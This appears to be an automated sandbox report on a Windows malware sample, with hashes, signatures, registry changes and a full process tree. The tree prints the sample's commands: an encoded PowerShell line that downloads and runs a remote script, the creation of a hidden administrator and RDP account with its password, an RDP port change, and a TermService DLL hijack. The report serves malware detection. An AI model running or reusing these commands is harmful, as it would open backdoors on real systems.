Analysis
max time kernel: 110s
max time network: 121s
platform: windows10_x64
resource: win10-en-20211014
submitted: 05-12-2021 07:54

Static task: static1
Behavioral task: behavioral1
Sample: 65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe
Resource: win10-en-20211014
General
Target: 65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe
Size: 4.6MB
MD5: f616975d69da372f403d58ba955dc510
SHA1: e22fcb3ec811cba8d74d4f897d495f21e8c88224
SHA256: 65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874
SHA512: 2be545ed1a330f76ff21e3f8406b4982b86a432065264fd88008ab762bf2fafb0f892cbee2b395cdd62c6be98ce02868223331bf1f3e9402cde6f366ca8c49e5
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
Processes (flow, pid, process):
- flow 29, pid 2820, powershell.exe
- flow 31, pid 2820, powershell.exe
- flow 32, pid 2820, powershell.exe
- flow 33, pid 2820, powershell.exe
- flow 35, pid 2820, powershell.exe
- flow 37, pid 2820, powershell.exe
- flow 39, pid 2820, powershell.exe
- flow 41, pid 2820, powershell.exe
- flow 43, pid 2820, powershell.exe
Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

Resources matched (resource, yara_rule):
- \Windows\Branding\mediasrv.png: upx
- \Windows\Branding\mediasvc.png: upx
Loads dropped DLL (2 IoCs)
Processes (pid, process):
- 3192 (process name blank in the report)
- 3192 (process name blank in the report)
Drops file in Program Files directory (4 IoCs)
Processes (description, ioc, process):
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
Drops file in Windows directory (19 IoCs)
Processes (description, ioc, process):
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BB9.tmp (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BCA.tmp (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\branding\mediasvc.png (powershell.exe)
- File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
- File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
- File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4jaajhxd.wt1.psm1 (powershell.exe)
- File created: C:\Windows\branding\mediasrv.png (powershell.exe)
- File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
- File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6B39.tmp (powershell.exe)
- File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat (powershell.exe)
- File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
- File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_v0121kv2.cqu.ps1 (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6B98.tmp (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BA8.tmp (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
Modifies data under HKEY_USERS (64 IoCs)
Processes (description, ioc, process); S-1-5-20 is the NETWORK SERVICE account's hive:
- Key created: \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" (powershell.exe)
- Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" (powershell.exe)
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe
Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes (description, flow, ioc):
- HTTP User-Agent header, flow 31: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 32: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 33: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 35: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes (pid, process):
- 520 powershell.exe (3 events)
- 1712 powershell.exe (3 events)
- 1964 powershell.exe (3 events)
- 1388 powershell.exe (3 events)
- 520 powershell.exe (3 events)
- 2820 powershell.exe (3 events)
Suspicious behavior: LoadsDriver (2 IoCs)
Processes (pid, process):
- 632 (process name blank in the report; 2 events)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (description, pid, process), grouped by pid:
- pid 520 powershell.exe, Token: SeDebugPrivilege
- pid 1712 powershell.exe, Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- pid 1964 powershell.exe, Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- pid 1388 powershell.exe, Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description, pid, process, target process); every pair below was recorded twice:
- PID 4064 wrote to memory of 520: 65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe -> powershell.exe
- PID 520 wrote to memory of 2536: powershell.exe -> csc.exe
- PID 2536 wrote to memory of 884: csc.exe -> cvtres.exe
- PID 520 wrote to memory of 1304: powershell.exe -> csc.exe
- PID 1304 wrote to memory of 3640: csc.exe -> cvtres.exe
- PID 520 wrote to memory of 1712: powershell.exe -> powershell.exe
- PID 520 wrote to memory of 1964: powershell.exe -> powershell.exe
- PID 520 wrote to memory of 1388: powershell.exe -> powershell.exe
- PID 520 wrote to memory of 3464: powershell.exe -> reg.exe
- PID 520 wrote to memory of 3704: powershell.exe -> reg.exe
- PID 520 wrote to memory of 1036: powershell.exe -> reg.exe
- PID 520 wrote to memory of 3180: powershell.exe -> net.exe
- PID 3180 wrote to memory of 2820: net.exe -> net1.exe
- PID 520 wrote to memory of 3812: powershell.exe -> cmd.exe
- PID 3812 wrote to memory of 3032: cmd.exe -> cmd.exe
- PID 3032 wrote to memory of 8: cmd.exe -> net.exe
- PID 8 wrote to memory of 752: net.exe -> net1.exe
- PID 520 wrote to memory of 3172: powershell.exe -> cmd.exe
- PID 3172 wrote to memory of 3576: cmd.exe -> cmd.exe
- PID 3576 wrote to memory of 3160: cmd.exe -> net.exe
- PID 3160 wrote to memory of 2176: net.exe -> net1.exe
- PID 500 wrote to memory of 2612: cmd.exe -> net.exe
- PID 2612 wrote to memory of 1048: net.exe -> net1.exe
- PID 3944 wrote to memory of 3988: cmd.exe -> net.exe
- PID 3988 wrote to memory of 1456: net.exe -> net1.exe
- PID 1964 wrote to memory of 2800: cmd.exe -> net.exe
- PID 2800 wrote to memory of 3548: net.exe -> net1.exe
- PID 1308 wrote to memory of 1884: cmd.exe -> net.exe
- PID 1884 wrote to memory of 1984: net.exe -> net1.exe
- PID 2848 wrote to memory of 584: cmd.exe -> net.exe
- PID 584 wrote to memory of 3456: net.exe -> net1.exe
- PID 3276 wrote to memory of 3084: cmd.exe -> net.exe
Processes
Tree depth is given in brackets; each entry lists the image path, the recorded command line, and the signatures that fired on that process.

[1] C:\Users\Admin\AppData\Local\Temp\65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1123.tmp" "c:\Users\Admin\AppData\Local\Temp\yi2wujv5\CSCAFBD4976229C4F7597F5B97153978B2D.TMP"
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17BA.tmp" "c:\Users\Admin\AppData\Local\Temp\sn53rhrj\CSCB729DAFD60D64B9A92E2826B327DF462.TMP"
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\reg.exe
        command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          command line: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            command line: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              command line: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          command line: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            command line: net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              command line: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      command line: net.exe user wgautilacc Ghar4f5 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user wgautilacc o18EWFWJ /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      command line: net.exe user wgautilacc o18EWFWJ /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user wgautilacc o18EWFWJ /add

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    command line: cmd /C net.exe user wgautilacc o18EWFWJ
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      command line: net.exe user wgautilacc o18EWFWJ
    [3] C:\Windows\system32\net1.exe
        command line: C:\Windows\system32\net1 user wgautilacc o18EWFWJ

[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      command line: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS

[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      command line: wmic CPU get NAME

[1] C:\Windows\System32\cmd.exe
    command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
